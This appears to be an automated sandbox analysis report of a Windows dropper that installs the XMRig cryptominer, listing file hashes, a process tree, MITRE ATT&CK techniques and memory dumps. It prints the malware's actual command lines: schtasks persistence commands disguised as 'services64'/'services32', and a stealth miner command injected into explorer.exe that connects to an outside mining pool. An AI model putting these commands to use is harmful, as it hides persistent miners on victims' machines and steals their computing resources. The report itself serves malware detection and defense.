xmrig | de5d543be8cd62ef0b23cfba8d9e6bd867be8d642099bd7eea4cef872b91d46d

Analysis

max time kernel
148s
max time network
154s
platform
windows10_x64
resource
win10v20210408
submitted
19-07-2021 21:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

mixazed_20210719-222908.exe
Size

3.2MB
MD5

379b06514e47a54d8a7ce19bd82e16bf
SHA1

a43d359cb07311c9bafd99e8d26501d1c76e4e4f
SHA256

de5d543be8cd62ef0b23cfba8d9e6bd867be8d642099bd7eea4cef872b91d46d
SHA512

c5c943cb027e60ebbde20cfc9bae6b2fd74de18dfaf30cf406ce4bacad209d1c8fe02286bf45ca481cfb3301a0eb2578d5b62458380154c776a49915f2146847

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/3480-237-0x00000001402EB66C-mapping.dmp	xmrig
behavioral2/memory/3480-242-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig

Executes dropped EXE 6 IoCs

Processes:

1.exeservices64.exe2.exesihost64.exeservices32.exesihost32.exe

pid process

2216 1.exe
584 services64.exe
2568 2.exe
3636 sihost64.exe
3492 services32.exe
516 sihost32.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of SetThreadContext 1 IoCs

Processes:

services64.exe

description pid process target process

PID 584 set thread context of 3480 584 services64.exe explorer.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2204 schtasks.exe
2300 schtasks.exe
2936 schtasks.exe
3352 schtasks.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

1.exeservices64.exe2.exeservices32.exe

pid process

2216 1.exe
584 services64.exe
2568 2.exe
3492 services32.exe

pid	process
2216	1.exe
584	services64.exe
2568	2.exe
3636	sihost64.exe
3492	services32.exe
516	sihost32.exe

description	pid	process	target process
PID 584 set thread context of 3480	584	services64.exe	explorer.exe

pid	process
2204	schtasks.exe
2300	schtasks.exe
2936	schtasks.exe
3352	schtasks.exe

pid	process
2216	1.exe
584	services64.exe
2568	2.exe
3492	services32.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

1.exeservices64.exe2.exeexplorer.exeservices32.exe

description	pid	process
Token: SeDebugPrivilege	2216	1.exe
Token: SeDebugPrivilege	584	services64.exe
Token: SeDebugPrivilege	2568	2.exe
Token: SeLockMemoryPrivilege	3480	explorer.exe
Token: SeLockMemoryPrivilege	3480	explorer.exe
Token: SeDebugPrivilege	3492	services32.exe

Suspicious use of WriteProcessMemory 43 IoCs

Processes:

mixazed_20210719-222908.exe1.execmd.exeservices64.exe2.execmd.execmd.exeservices32.execmd.exe

description	pid	process	target process
PID 416 wrote to memory of 2216	416	mixazed_20210719-222908.exe	1.exe
PID 416 wrote to memory of 2216	416	mixazed_20210719-222908.exe	1.exe
PID 2216 wrote to memory of 3492	2216	1.exe	cmd.exe
PID 2216 wrote to memory of 3492	2216	1.exe	cmd.exe
PID 3492 wrote to memory of 2204	3492	cmd.exe	schtasks.exe
PID 3492 wrote to memory of 2204	3492	cmd.exe	schtasks.exe
PID 2216 wrote to memory of 584	2216	1.exe	services64.exe
PID 2216 wrote to memory of 584	2216	1.exe	services64.exe
PID 416 wrote to memory of 2568	416	mixazed_20210719-222908.exe	2.exe
PID 416 wrote to memory of 2568	416	mixazed_20210719-222908.exe	2.exe
PID 584 wrote to memory of 500	584	services64.exe	cmd.exe
PID 584 wrote to memory of 500	584	services64.exe	cmd.exe
PID 2568 wrote to memory of 516	2568	2.exe	cmd.exe
PID 2568 wrote to memory of 516	2568	2.exe	cmd.exe
PID 584 wrote to memory of 3636	584	services64.exe	sihost64.exe
PID 584 wrote to memory of 3636	584	services64.exe	sihost64.exe
PID 500 wrote to memory of 2300	500	cmd.exe	schtasks.exe
PID 500 wrote to memory of 2300	500	cmd.exe	schtasks.exe
PID 516 wrote to memory of 2936	516	cmd.exe	schtasks.exe
PID 516 wrote to memory of 2936	516	cmd.exe	schtasks.exe
PID 584 wrote to memory of 3480	584	services64.exe	explorer.exe
PID 584 wrote to memory of 3480	584	services64.exe	explorer.exe
PID 584 wrote to memory of 3480	584	services64.exe	explorer.exe
PID 584 wrote to memory of 3480	584	services64.exe	explorer.exe
PID 584 wrote to memory of 3480	584	services64.exe	explorer.exe
PID 584 wrote to memory of 3480	584	services64.exe	explorer.exe
PID 584 wrote to memory of 3480	584	services64.exe	explorer.exe
PID 584 wrote to memory of 3480	584	services64.exe	explorer.exe
PID 584 wrote to memory of 3480	584	services64.exe	explorer.exe
PID 584 wrote to memory of 3480	584	services64.exe	explorer.exe
PID 584 wrote to memory of 3480	584	services64.exe	explorer.exe
PID 584 wrote to memory of 3480	584	services64.exe	explorer.exe
PID 584 wrote to memory of 3480	584	services64.exe	explorer.exe
PID 584 wrote to memory of 3480	584	services64.exe	explorer.exe
PID 584 wrote to memory of 3480	584	services64.exe	explorer.exe
PID 2568 wrote to memory of 3492	2568	2.exe	services32.exe
PID 2568 wrote to memory of 3492	2568	2.exe	services32.exe
PID 3492 wrote to memory of 2324	3492	services32.exe	cmd.exe
PID 3492 wrote to memory of 2324	3492	services32.exe	cmd.exe
PID 3492 wrote to memory of 516	3492	services32.exe	sihost32.exe
PID 3492 wrote to memory of 516	3492	services32.exe	sihost32.exe
PID 2324 wrote to memory of 3352	2324	cmd.exe	schtasks.exe
PID 2324 wrote to memory of 3352	2324	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\mixazed_20210719-222908.exe
"C:\Users\Admin\AppData\Local\Temp\mixazed_20210719-222908.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:416

C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2216

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"c:\users\admin\appdata\local\temp\services64.exe"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:3492

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"c:\users\admin\appdata\local\temp\services64.exe"'
4⤵
- Creates scheduled task(s)
PID:2204

C:\Users\Admin\appdata\local\temp\services64.exe
"C:\Users\Admin\appdata\local\temp\services64.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:584

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"c:\users\admin\appdata\local\temp\services64.exe"' & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:500

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"c:\users\admin\appdata\local\temp\services64.exe"'
5⤵
- Creates scheduled task(s)
PID:2300

C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
"C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe"
4⤵
- Executes dropped EXE
PID:3636

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=stratum+tcp://xmr.viabtc.com:8888 --user=Slicem --pass= --cpu-max-threads-hint=20 --cinit-idle-wait=1 --cinit-idle-cpu=40 --cinit-stealth
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3480

C:\Users\Admin\AppData\Local\Temp\RarSFX0\2.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\2.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2568

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"c:\users\admin\appdata\local\temp\services32.exe"' & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:516

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"c:\users\admin\appdata\local\temp\services32.exe"'
4⤵
- Creates scheduled task(s)
PID:2936

C:\Users\Admin\appdata\local\temp\services32.exe
"C:\Users\Admin\appdata\local\temp\services32.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3492

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"c:\users\admin\appdata\local\temp\services32.exe"' & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:2324

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"c:\users\admin\appdata\local\temp\services32.exe"'
5⤵
- Creates scheduled task(s)
PID:3352

C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
"C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"
4⤵
- Executes dropped EXE
PID:516

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe
MD5
d915eb706a9ad54f27c85a84e2a75704

SHA1
5c50e7e131c9d20ef07d0427d1d2f1046c185855

SHA256
58451f2c776d0eaa6e66158b0bd5e3a9dbeab0a3330d82bcd67ddb39993cc2e3

SHA512
46743f1c132284b0ed756eb620f4a1d27484c1e7f5b68579295d52e274f36a1606050b3c75c491bfab5e5d91717b5680663e36d482f149e9e860a02f05374984

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe
MD5
d915eb706a9ad54f27c85a84e2a75704

SHA1
5c50e7e131c9d20ef07d0427d1d2f1046c185855

SHA256
58451f2c776d0eaa6e66158b0bd5e3a9dbeab0a3330d82bcd67ddb39993cc2e3

SHA512
46743f1c132284b0ed756eb620f4a1d27484c1e7f5b68579295d52e274f36a1606050b3c75c491bfab5e5d91717b5680663e36d482f149e9e860a02f05374984

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\2.exe
MD5
846b9e20fc1ea8d299069866bf46ed41

SHA1
3dc878e63880e506be67f0dbd9b531da7b21e1cb

SHA256
c9e761cde77de4df50b3983eb0d276044d4d4814f023618c659df8a0fe276309

SHA512
3fa665df2f168f640b3e96f5ad763003a12182f78e36e7c6d43ef3ed075a33c71d2852a0c56ea011368312c4932c029ead08d6b11799a2499eea7166b449cdb3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\2.exe
MD5
846b9e20fc1ea8d299069866bf46ed41

SHA1
3dc878e63880e506be67f0dbd9b531da7b21e1cb

SHA256
c9e761cde77de4df50b3983eb0d276044d4d4814f023618c659df8a0fe276309

SHA512
3fa665df2f168f640b3e96f5ad763003a12182f78e36e7c6d43ef3ed075a33c71d2852a0c56ea011368312c4932c029ead08d6b11799a2499eea7166b449cdb3

Download Submit
C:\Users\Admin\AppData\Local\Temp\services32.exe
MD5
846b9e20fc1ea8d299069866bf46ed41

SHA1
3dc878e63880e506be67f0dbd9b531da7b21e1cb

SHA256
c9e761cde77de4df50b3983eb0d276044d4d4814f023618c659df8a0fe276309

SHA512
3fa665df2f168f640b3e96f5ad763003a12182f78e36e7c6d43ef3ed075a33c71d2852a0c56ea011368312c4932c029ead08d6b11799a2499eea7166b449cdb3

Download Submit
C:\Users\Admin\AppData\Local\Temp\services64.exe
MD5
d915eb706a9ad54f27c85a84e2a75704

SHA1
5c50e7e131c9d20ef07d0427d1d2f1046c185855

SHA256
58451f2c776d0eaa6e66158b0bd5e3a9dbeab0a3330d82bcd67ddb39993cc2e3

SHA512
46743f1c132284b0ed756eb620f4a1d27484c1e7f5b68579295d52e274f36a1606050b3c75c491bfab5e5d91717b5680663e36d482f149e9e860a02f05374984

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\libs\sihost64.exe
MD5
a891eeeb9726b351e7b8774a0711b01d

SHA1
6cfc9f8b0aca2645b4dfc0913fdf4013b29532dd

SHA256
41254f4ef060944b40cb73dc4883cff3ba321006cdf605cc058a7baf1cb704c6

SHA512
600e4475cbf675b2295a8540d61fd91b416d8f2d965f098aaa11855b7210a401a5b7942c298f213f544b2c82cc4c82d9130607affe92ebc52032267ababb01c3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\telemetry\sihost32.exe
MD5
767b138625feab1d12a2a5ca186fe2a0

SHA1
129f88e5a21e167adbc8c156aa25f8514de82bfc

SHA256
97be56392d3b36d92901eea57a18cffca2d8b1df459e6c5600e74755348bd04b

SHA512
d0dec5337c649f131d2ef53f8798998efeda87b56be709234990072cb706ea3a1f27d2e556a6d667182371303a944f4d849fd7de58af8be670b62d75ff112947

Download Submit
C:\Users\Admin\appdata\local\temp\services32.exe
MD5
846b9e20fc1ea8d299069866bf46ed41

SHA1
3dc878e63880e506be67f0dbd9b531da7b21e1cb

SHA256
c9e761cde77de4df50b3983eb0d276044d4d4814f023618c659df8a0fe276309

SHA512
3fa665df2f168f640b3e96f5ad763003a12182f78e36e7c6d43ef3ed075a33c71d2852a0c56ea011368312c4932c029ead08d6b11799a2499eea7166b449cdb3

Download Submit
C:\Users\Admin\appdata\local\temp\services64.exe
MD5
d915eb706a9ad54f27c85a84e2a75704

SHA1
5c50e7e131c9d20ef07d0427d1d2f1046c185855

SHA256
58451f2c776d0eaa6e66158b0bd5e3a9dbeab0a3330d82bcd67ddb39993cc2e3

SHA512
46743f1c132284b0ed756eb620f4a1d27484c1e7f5b68579295d52e274f36a1606050b3c75c491bfab5e5d91717b5680663e36d482f149e9e860a02f05374984

Download Submit
C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
MD5
a891eeeb9726b351e7b8774a0711b01d

SHA1
6cfc9f8b0aca2645b4dfc0913fdf4013b29532dd

SHA256
41254f4ef060944b40cb73dc4883cff3ba321006cdf605cc058a7baf1cb704c6

SHA512
600e4475cbf675b2295a8540d61fd91b416d8f2d965f098aaa11855b7210a401a5b7942c298f213f544b2c82cc4c82d9130607affe92ebc52032267ababb01c3

Download Submit
C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
MD5
767b138625feab1d12a2a5ca186fe2a0

SHA1
129f88e5a21e167adbc8c156aa25f8514de82bfc

SHA256
97be56392d3b36d92901eea57a18cffca2d8b1df459e6c5600e74755348bd04b

SHA512
d0dec5337c649f131d2ef53f8798998efeda87b56be709234990072cb706ea3a1f27d2e556a6d667182371303a944f4d849fd7de58af8be670b62d75ff112947

Download Submit
memory/500-224-0x0000000000000000-mapping.dmp

Download
memory/516-225-0x0000000000000000-mapping.dmp

Download
memory/516-278-0x0000000000000000-mapping.dmp

Download
memory/516-286-0x000000001C9E0000-0x000000001C9E2000-memory.dmp

Filesize
8KB

Download
memory/584-218-0x00007FFFB7F30000-0x00007FFFB7F40000-memory.dmp

Filesize
64KB

Download
memory/584-233-0x000000001CE40000-0x000000001CE42000-memory.dmp

Filesize
8KB

Download
memory/584-154-0x0000000000000000-mapping.dmp

Download
memory/2204-153-0x0000000000000000-mapping.dmp

Download
memory/2216-151-0x0000000003580000-0x0000000003581000-memory.dmp

Filesize
4KB

Download
memory/2216-128-0x00007FFFB7F00000-0x00007FFFB7F10000-memory.dmp

Filesize
64KB

Download
memory/2216-138-0x00007FFFB7F00000-0x00007FFFB7F10000-memory.dmp

Filesize
64KB

Download
memory/2216-139-0x00007FFFB7F00000-0x00007FFFB7F10000-memory.dmp

Filesize
64KB

Download
memory/2216-140-0x00007FFFB7F00000-0x00007FFFB7F10000-memory.dmp

Filesize
64KB

Download
memory/2216-141-0x00007FFFB7F00000-0x00007FFFB7F10000-memory.dmp

Filesize
64KB

Download
memory/2216-142-0x00007FFFB7F00000-0x00007FFFB7F10000-memory.dmp

Filesize
64KB

Download
memory/2216-143-0x00007FFFB7F00000-0x00007FFFB7F10000-memory.dmp

Filesize
64KB

Download
memory/2216-144-0x00007FFFB7F00000-0x00007FFFB7F10000-memory.dmp

Filesize
64KB

Download
memory/2216-146-0x00007FF79B0B0000-0x00007FF79B0B1000-memory.dmp

Filesize
4KB

Download
memory/2216-148-0x00007FFFB7F30000-0x00007FFFB7F40000-memory.dmp

Filesize
64KB

Download
memory/2216-149-0x0000000003470000-0x0000000003479000-memory.dmp

Filesize
36KB

Download
memory/2216-150-0x000000001D5B0000-0x000000001D5B2000-memory.dmp

Filesize
8KB

Download
memory/2216-116-0x0000000000000000-mapping.dmp

Download
memory/2216-120-0x00007FFFB7F00000-0x00007FFFB7F10000-memory.dmp

Filesize
64KB

Download
memory/2216-137-0x00007FFFB7F00000-0x00007FFFB7F10000-memory.dmp

Filesize
64KB

Download
memory/2216-135-0x00007FFFB7F00000-0x00007FFFB7F10000-memory.dmp

Filesize
64KB

Download
memory/2216-134-0x00007FFFB7F00000-0x00007FFFB7F10000-memory.dmp

Filesize
64KB

Download
memory/2216-133-0x00007FFFB7F00000-0x00007FFFB7F10000-memory.dmp

Filesize
64KB

Download
memory/2216-119-0x00007FFFB7F00000-0x00007FFFB7F10000-memory.dmp

Filesize
64KB

Download
memory/2216-132-0x00007FFFB7F00000-0x00007FFFB7F10000-memory.dmp

Filesize
64KB

Download
memory/2216-130-0x00007FFFB7F00000-0x00007FFFB7F10000-memory.dmp

Filesize
64KB

Download
memory/2216-121-0x00007FFFB7F00000-0x00007FFFB7F10000-memory.dmp

Filesize
64KB

Download
memory/2216-131-0x00007FFFB7F00000-0x00007FFFB7F10000-memory.dmp

Filesize
64KB

Download
memory/2216-129-0x00007FFFB7F00000-0x00007FFFB7F10000-memory.dmp

Filesize
64KB

Download
memory/2216-136-0x00007FFFB7F00000-0x00007FFFB7F10000-memory.dmp

Filesize
64KB

Download
memory/2216-122-0x00007FFFB7F00000-0x00007FFFB7F10000-memory.dmp

Filesize
64KB

Download
memory/2216-127-0x00007FFFB7F00000-0x00007FFFB7F10000-memory.dmp

Filesize
64KB

Download
memory/2216-126-0x00007FFFB7F00000-0x00007FFFB7F10000-memory.dmp

Filesize
64KB

Download
memory/2216-123-0x00007FFFB7F00000-0x00007FFFB7F10000-memory.dmp

Filesize
64KB

Download
memory/2216-124-0x00007FFFB7F00000-0x00007FFFB7F10000-memory.dmp

Filesize
64KB

Download
memory/2216-125-0x00007FFFB7F00000-0x00007FFFB7F10000-memory.dmp

Filesize
64KB

Download
memory/2300-231-0x0000000000000000-mapping.dmp

Download
memory/2324-277-0x0000000000000000-mapping.dmp

Download
memory/2568-157-0x0000000000000000-mapping.dmp

Download
memory/2568-219-0x00007FFFB7F30000-0x00007FFFB7F40000-memory.dmp

Filesize
64KB

Download
memory/2568-234-0x0000000004180000-0x0000000004182000-memory.dmp

Filesize
8KB

Download
memory/2936-232-0x0000000000000000-mapping.dmp

Download
memory/3352-283-0x0000000000000000-mapping.dmp

Download
memory/3480-242-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/3480-237-0x00000001402EB66C-mapping.dmp

Download
memory/3480-284-0x0000000000C40000-0x0000000000C60000-memory.dmp

Filesize
128KB

Download
memory/3480-287-0x0000000000C60000-0x0000000000C80000-memory.dmp

Filesize
128KB

Download
memory/3480-288-0x0000000000C60000-0x0000000000C80000-memory.dmp

Filesize
128KB

Download
memory/3492-274-0x00007FFFB7F30000-0x00007FFFB7F40000-memory.dmp

Filesize
64KB

Download
memory/3492-239-0x0000000000000000-mapping.dmp

Download
memory/3492-285-0x0000000003B80000-0x0000000003B82000-memory.dmp

Filesize
8KB

Download
memory/3492-152-0x0000000000000000-mapping.dmp

Download
memory/3636-226-0x0000000000000000-mapping.dmp

Download
memory/3636-235-0x00000000031D0000-0x00000000031D2000-memory.dmp

Filesize
8KB

Download